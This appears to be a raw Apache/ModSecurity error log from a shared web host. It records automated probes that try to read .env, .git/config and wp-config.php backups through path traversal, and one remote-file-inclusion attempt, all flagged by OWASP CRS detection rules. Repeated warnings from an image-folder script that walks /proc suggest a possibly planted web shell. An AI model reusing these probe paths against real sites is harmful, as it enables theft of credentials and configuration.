[Tue May 12 00:58:00.738890 2026] [autoindex:error] [pid 1605480:tid 1605541] [client 34.34.253.69:39730] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:58:05.311560 2026] [autoindex:error] [pid 1695975:tid 1695997] [client 34.34.253.69:2267] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:58:10.361721 2026] [security2:error] [pid 1605480:tid 1605529] [client 43.130.101.151:43296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agJfAh2Cvzd_nyNfUm81ywAAAQc"], referer: http://www.missmandarine.com
PHP Warning:  filesize(): stat failed for /proc/851/task/851/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/851/task/851/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/851/task/851/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/851/task/851/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/851/task/851/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/851/task/851/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/568/task/568/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/568/task/568/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/568/task/568/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/568/task/568/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/568/task/568/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/568/task/568/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/111/task/111/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/111/task/111/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/111/task/111/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/107/task/107/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/107/task/107/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/107/task/107/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/107/task/107/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/107/task/107/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/107/task/107/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/590/task/590/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/590/task/590/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:59:01.506866 2026] [core:error] [pid 1695975:tid 1696001] [client 74.7.175.166:43976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:59:01.508111 2026] [core:error] [pid 1695975:tid 1696001] [client 74.7.175.166:43976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:59:07.421519 2026] [core:error] [pid 1605480:tid 1605537] [client 45.148.10.238:54324] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 00:59:07.542807 2026] [core:error] [pid 1606352:tid 1606421] [client 45.148.10.238:54232] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 00:59:07.636010 2026] [core:error] [pid 1630927:tid 1630946] [client 45.148.10.238:54360] AH10244: invalid URI path (/../.env)
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790184/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790184/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790184/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790184/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790184/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790184/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:59:27.565770 2026] [security2:error] [pid 1695975:tid 1695997] [client 43.156.116.44:34644] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agJfT9VI9ymHBxup749qfAAAAJM"]
[Tue May 12 00:59:33.950388 2026] [security2:error] [pid 1605480:tid 1605538] [client 43.155.27.244:34326] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/centaurea/"] [unique_id "agJfVR2Cvzd_nyNfUm82JgAAARA"]
[Tue May 12 01:00:11.436422 2026] [security2:error] [pid 1630927:tid 1630952] [client 43.159.63.116:45716] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agJfe2iGYYhUwDaJINnEgAAAAVY"]
[Tue May 12 01:00:19.861033 2026] [security2:error] [pid 1605480:tid 1605524] [client 43.160.219.206:50082] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJfgx2Cvzd_nyNfUm82ogAAAQI"]
[Tue May 12 01:00:26.779733 2026] [security2:error] [pid 1630927:tid 1630937] [client 43.156.43.123:46142] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agJfimiGYYhUwDaJINnEiAAAAUc"]
[Tue May 12 01:00:29.720783 2026] [security2:error] [pid 1606352:tid 1606433] [client 43.156.43.123:57494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agJfjXo_DFxNSZVmaX0FlgAAAM4"], referer: http://jeanboyault.fr
[Tue May 12 01:00:32.878393 2026] [authz_core:error] [pid 1605480:tid 1605538] [client 40.77.167.35:63583] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/library/error_log
[Tue May 12 01:00:33.880121 2026] [security2:error] [pid 1606352:tid 1606421] [client 43.156.43.123:37464] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agJfkXo_DFxNSZVmaX0FlwAAAMI"], referer: https://jeanboyault.fr/
[Tue May 12 01:00:44.326850 2026] [security2:error] [pid 1691274:tid 1691283] [client 43.159.136.201:55026] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/temoignages/feed/"] [unique_id "agJfnFfdQaraX_prmqf82AAAAAY"]
[Tue May 12 01:00:48.564690 2026] [security2:error] [pid 1606352:tid 1606419] [client 34.130.120.108:60218] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJfoHo_DFxNSZVmaX0FuAAAAMA"]
[Tue May 12 01:00:48.564906 2026] [security2:error] [pid 1606352:tid 1606419] [client 34.130.120.108:60218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJfoHo_DFxNSZVmaX0FuAAAAMA"]
[Tue May 12 01:00:48.565149 2026] [security2:error] [pid 1606352:tid 1606419] [client 34.130.120.108:60218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJfoHo_DFxNSZVmaX0FuAAAAMA"]
[Tue May 12 01:00:53.210234 2026] [security2:error] [pid 1605480:tid 1605531] [client 43.164.196.47:51296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agJfpR2Cvzd_nyNfUm821QAAAQk"]
[Tue May 12 01:00:54.678828 2026] [security2:error] [pid 1695975:tid 1695979] [client 43.164.196.47:56982] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agJfptVI9ymHBxup749rUQAAAIE"], referer: http://cpc-entreprises.com
[Tue May 12 01:00:55.640922 2026] [security2:error] [pid 1605480:tid 1605541] [client 57.141.20.42:36312] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://173.212.198.55 found within ARGS:url: http://173.212.198.55/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJfpx2Cvzd_nyNfUm821gAAARM"]
[Tue May 12 01:00:55.641480 2026] [security2:error] [pid 1605480:tid 1605541] [client 57.141.20.42:36312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJfpx2Cvzd_nyNfUm821gAAARM"]
[Tue May 12 01:00:55.641811 2026] [security2:error] [pid 1605480:tid 1605541] [client 57.141.20.42:36312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJfpx2Cvzd_nyNfUm821gAAARM"]
[Tue May 12 01:00:57.866402 2026] [security2:error] [pid 1605480:tid 1605524] [client 185.213.246.186:34833] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJfqR2Cvzd_nyNfUm821wAAAQI"], referer: https://www.piregwan-genesis.com/
[Tue May 12 01:01:25.696702 2026] [:error] [pid 1691274:tid 1691277] [client 154.16.20.106:41451] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Tue May 12 01:01:27.253208 2026] [:error] [pid 1691274:tid 1691278] [client 154.16.20.106:52563] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Tue May 12 01:01:33.310114 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php.backup"] [unique_id "agJfzdVI9ymHBxup749rlwAAAI0"]
[Tue May 12 01:01:33.310269 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php.backup"] [unique_id "agJfzdVI9ymHBxup749rlwAAAI0"]
[Tue May 12 01:01:33.360760 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJfzdVI9ymHBxup749rlwAAAI0"]
[Tue May 12 01:01:37.804927 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/backup.wp-config.php"] [unique_id "agJf0dVI9ymHBxup749rqgAAAI0"]
[Tue May 12 01:01:37.805066 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/backup.wp-config.php"] [unique_id "agJf0dVI9ymHBxup749rqgAAAI0"]
[Tue May 12 01:01:37.856386 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJf0dVI9ymHBxup749rqgAAAI0"]
[Tue May 12 01:01:43.709593 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/new-wp-config.php"] [unique_id "agJf19VI9ymHBxup749rxAAAAI0"]
[Tue May 12 01:01:43.709751 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/new-wp-config.php"] [unique_id "agJf19VI9ymHBxup749rxAAAAI0"]
[Tue May 12 01:01:43.760107 2026] [security2:error] [pid 1695975:tid 1695991] [client 172.212.217.10:30851] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJf19VI9ymHBxup749rxAAAAI0"]
